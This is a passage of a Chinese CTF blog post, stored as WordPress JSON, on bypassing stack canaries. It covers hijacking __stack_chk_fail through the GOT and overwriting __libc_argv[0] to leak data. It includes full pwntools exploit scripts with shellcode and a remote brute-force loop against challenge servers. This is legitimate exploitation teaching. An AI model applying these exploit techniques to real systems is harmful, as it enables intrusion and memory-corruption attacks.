id=\"%E5%8A%AB%E6%8C%81_stack_chk_fail%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87canary\"><\/span>\u52ab\u6301___stack_chk_fail\u51fd\u6570\u7ed5\u8fc7canary<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u539f\u7406\uff1a\u68c0\u6d4b\u5230canary\u88ab\u7be1\u6539\u540e\uff0c\u7a0b\u5e8f\u4f1a\u8c03\u7528___stack_chk_fail\u51fd\u6570\u6765\u9000\u51fa\u7a0b\u5e8f\uff0c\u5982\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NNKTODF_GX6LBG5O7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"794\" height=\"365\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NNKTODF_GX6LBG5O7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-520\"  sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u80fd\u7be1\u6539GOT\u8868\u4e2d___stack_chk_fail\u7684\u503c\u4e3a\u76ee\u6807\u51fd\u6570\u7684\u503c\uff0c\u5728\u89e6\u53d1canary\u7be1\u6539\u68c0\u6d4b\u65f6\u5c31\u4f1a\u8c03\u7528\u76ee\u6807\u51fd\u6570\u800c\u4e0d\u662f___stack_chk_fail\u3002<\/p>\n\n\n\n<p>\u4f8b\u9898\uff1a2024\u6e90\u9c81\u676f canary_orw<\/p>\n\n\n\n<p>main\u51fd\u6570\uff0c\u6709\u6c99\u7bb1\uff0c\u7981\u7528\u4e86execve\uff0c\u6709\u6ea2\u51fa\u3002<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1IWJSD4NT@C57M6TYTN@KU.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"911\" height=\"520\" data-id=\"521\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1IWJSD4NT@C57M6TYTN@KU.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-521\"  sizes=\"auto, (max-width: 911px) 100vw, 911px\" \/><\/div><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u51fd\u6570vuln\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/62LK3ZUGPA5D9TGE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"890\" height=\"529\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/62LK3ZUGPA5D9TGE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-522\"  sizes=\"auto, (max-width: 890px) 100vw, 890px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>gadget\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NEPX@YILCZJIUJEXML.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"451\" height=\"345\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/NEPX@YILCZJIUJEXML.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-523\"  sizes=\"auto, (max-width: 451px) 100vw, 451px\" \/><\/div><\/figure>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>vuln\u7b2c\u4e00\u4e2aread\u53ef\u4ee5\u6ea2\u51fa\u5230v3\uff0c\u4e5f\u5c31\u662f\u53ef\u4ee5\u63a7\u5236\u4e0b\u4e00\u4e2asys_read\u7684\u5199\u5165\u5730\u5740\uff0c\u76f8\u5f53\u4e8e\u80fd\u4efb\u610f\u5730\u5740\u51998\u5b57\u8282\uff0c\u6700\u540e\u8fd8\u6709\u4e00\u4e2a\u8db3\u591f\u957f\u7684\u6ea2\u51fa\u3002<\/p>\n\n\n\n<p>\u6240\u4ee5\u601d\u8def\u5c31\u662f\uff0c\u5148\u5728main\u51fd\u6570\u4e2d\u6ea2\u51fa\u8986\u76d6ret\u5230vuln\uff0c\u7136\u540e\u7b2c\u4e00\u4e2aread\u7be1\u6539v3\u4e3a___stack_chk_fail\u7684got\u8868\u5730\u5740\uff0c\u4e0b\u4e00\u4e2asys_read\u5f80___stack_chk_fail\u7684got\u8868\u5730\u5740\u5199\u5165ret\u6307\u4ee4\u5730\u5740\u3002\uff08\u8fd9\u6837\u89e6\u53d1canary\u68c0\u6d4b\u65f6\u5019\u5c31\u4f1aret\u56de\u6765\uff09\u3002\u6700\u540e\u4e00\u4e2aread\u5f80\u8986\u76d6\u8fd4\u56de\u5730\u5740\u4e3ajmp rsp\uff0c\u7136\u540e\u540e\u9762\u7d27\u8ddf\u4e0ashellcode\u3002<\/p>\n\n\n\n<p>\u7a0b\u5e8f\u6d41\u6267\u884c\u6d41\u7a0b\u662f\uff0c\u5148\u4ecemain\u5230vuln\uff0c\u7136\u540e\u7b2c\u4e00\u4e2aread+\u7b2c\u4e8c\u4e2aread\u628a___stack_chk_fail\u7be1\u6539\u4e3aret\uff0c\u7b2c\u4e09\u4e2aread\u628a\u8fd4\u56de\u5730\u5740\u8986\u76d6\u6210jmp rsp\uff0c\u540e\u9762\u63a5\u4e0ashellcode\uff0c\u540c\u65f6\u89e6\u53d1canary\u7be1\u6539\u68c0\u6d4b\u3002\u7a0b\u5e8f\u8c03\u7528___stack_chk_fail,\u5b9e\u9645\u4e0a\u8c03\u7528\u4e86ret\uff0c\u7ee7\u7eed\u56de\u5230\u539fvuln\u51fd\u6570\uff0c\u7136\u540e\u5c31\u662fleave\uff0c\u6b64\u65f6rsp\u6307\u5411\u8fd4\u56de\u5730\u5740\uff08\u503c\u4e3a jmp rsp\u6307\u4ee4\u7684\u5730\u5740\uff09\uff0c\u63a5\u7740\u6267\u884cret\uff0cpop\u8fd4\u56de\u5730\u5740\u7684\u503c\u7ed9eip\uff0cesp\u5411\u4e0a\u79fb\u52a8\u4e00\u4e2a\u5355\u4f4d\uff0c\u6b63\u597d\u6307\u5411shellcode\uff0c\u7136\u540eeip\u6267\u884c jmp rsp\uff0c\u7a0b\u5e8f\u5c31\u4f1a\u6267\u884cshellcode\u3002<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<p>\u53ef\u4ee5\u53c2\u7167\u56fe\u6765\u770b\uff1a<\/p>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DHNGJDBO@DVV4H52J71.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"798\" height=\"266\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/DHNGJDBO@DVV4H52J71.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-524\"  sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/div><\/figure>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext(arch='amd64', os='linux', log_level='debug')\n\nr=process(\"\/home\/monke\/PWN\/CHB\/canary\")\nelf=ELF(\"\/home\/monke\/PWN\/CHB\/canary\")\n\njmp_rsp = 0x40081B\ncheck = elf.got&#91;'__stack_chk_fail']\nmain = elf.sym&#91;'main']\nret=0x4006ae\n\nshellcode = shellcraft.open('.\/flag')\nshellcode += shellcraft.read(3, 0x601060, 0x30)\nshellcode += shellcraft.write(1, 0x601060,0x30)\n\n\nr.sendlineafter(b'journey', p64(elf.sym&#91;'vuln']))\n#gdb.attach(r)\nr.sendafter(b'Sea', b'a' * 0x8 + p64(elf.got&#91;'__stack_chk_fail']))\n#gdb.attach(r)\nr.sendafter(b'magic', p64(ret))\nr.sendafter(b'go',b'a'*40+p64(jmp_rsp)  + asm(shellcode))\n\nr.interactive()\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SES1JFBEEX86NDAF-1024x455.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"455\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SES1JFBEEX86NDAF-1024x455.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-525\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E8%A6%86%E7%9B%96_libc_argv0\"><\/span> \u8986\u76d6__libc_argv[0]<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u539f\u7406\uff1a\u7531\u4e8ecanary\u68c0\u6d4b\u7be1\u6539\u540e\u4f1a\u8c03\u7528stack_chk_fail\u51fd\u6570\uff0c\u5176\u4e2d\u4e00\u4e2a\u53c2\u6570\u662f\u6587\u4ef6\u540d\uff0c\u5373\u201c__libc_argv[0]\u201d\uff0c\u5c06\u6b64\u8986\u76d6\u5c31\u80fd\u8f93\u51fa\u7279\u5b9a\u5185\u5bb9\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u98981\uff1actfshow pwn117<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/IDSFN6WXSJGUN9ZRPIO8-1024x643.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"643\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/IDSFN6WXSJGUN9ZRPIO8-1024x643.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-847\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u903b\u8f91\u975e\u5e38\u7b80\u5355\uff0cdebug\u7b97\u51fagets\u65f6\u5019\u7684\u6808\u5730\u5740\u548c__libc_argv[0]\u8ddd\u79bb\u5373\u53ef\uff0c\u4f46\u6211\u7b97\u4e0d\u5bf9\uff0c\u76f4\u63a5\u7206\u7834\uff1a<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\ncontext(arch='amd64', os='linux',log_level='info')\n#io = process('.\/pwn')\n\nflag = 0x6020A0 #buf\n\n\ndef pwn(i):\n\tprint(i)\n\tio.recvuntil('Haha,It has reduced you a lot of difficulty!')\n\tpayload = cyclic(i) + p64(flag)\n\tio.sendline(payload)\n\tprint(io.recvall())\n\tio.close()\n\t\nfor i in range(280,1000):\n        io = remote('pwn.challenge.ctf.show',28214)\n        pwn(i)\n        sleep(0.1)\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/N4W5YR47QES0HDNMF_HQN-1024x386.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"386\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/N4W5YR47QES0HDNMF_HQN-1024x386.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-848\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u98982\uff1a\u7f51\u9f0e\u676f2018_guess<\/p>\n\n\n\n<p>\u8fd9\u9898flag\u4e0d\u662f\u5b58\u5728bss\u6bb5\u800c\u662f\u5b58\u5728\u6808\u4e0a\uff0c\u6240\u4ee5\u9700\u8981\u8ba1\u7b97flag\u5730\u5740\uff0c\u6240\u5e78\u9898\u76ee\u4f7f\u7528fork\u7ed9\u4e86\u4e09\u6b21\u673a\u4f1a\u3002<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b21fork\u8986\u76d6__libc_argv[0]\u4e3aputs\u7684got\u8868\u5730\u5740\uff0c\u8ba1\u7b97libc\u57fa\u5740\uff0c\u8fdb\u800c\u8ba1\u7b97environ\u5730\u5740\uff08environ\u5b58\u4e86\u6808\u57fa\u5740\uff09<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b21fork\u8986\u76d6__libc_argv[0]environ\u5730\u5740\uff0c\u6cc4\u9732\u51fa\u6808\u57fa\u5740\uff0c\u8ba1\u7b97flag\u5730\u5740<\/p>\n\n\n\n<p>\u7b2c\u4e09\u6b21fork\u8986\u76d6__libc_argv[0]\u4e3aflag\u5730\u5740\uff0c\u6210\u529f\u6cc4\u9732\u3002<\/p>\n\n\n\n<p>\u8be6\u7ec6\u89c1\uff1a<a href=\"https:\/\/blog.csdn.net\/mcmuyanga\/article\/details\/114789897\">[BUUCTF]PWN\u2014\u2014wdb2018_guess\uff08stack smashing&#8211;canary\u62a5\u9519\u5229\u7528\uff09_buuctf canary-CSDN\u535a\u5ba2<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>canary\u4fdd\u62a4\u6982\u8ff0\uff1a Canary &#8211; CTF Wiki \u6211\u4eec\u77e5\u9053\uff0c\u901a\u5e38\u6808\u6ea2\u51fa\u7684\u5229\u7528\u65b9\u5f0f\u662f\u901a\u8fc7\u6ea2 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,17,13],"tags":[14,23],"class_list":["post-465","post","type-post","status-publish","format-standard","hentry","category-22","category-17","category-13","tag-pwn","tag-23"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/465","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=465"}],"version-history":[{"count":14,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/465\/revisions"}],"predecessor-version":[{"id":850,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/465\/revisions\/850"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=465"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=465"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}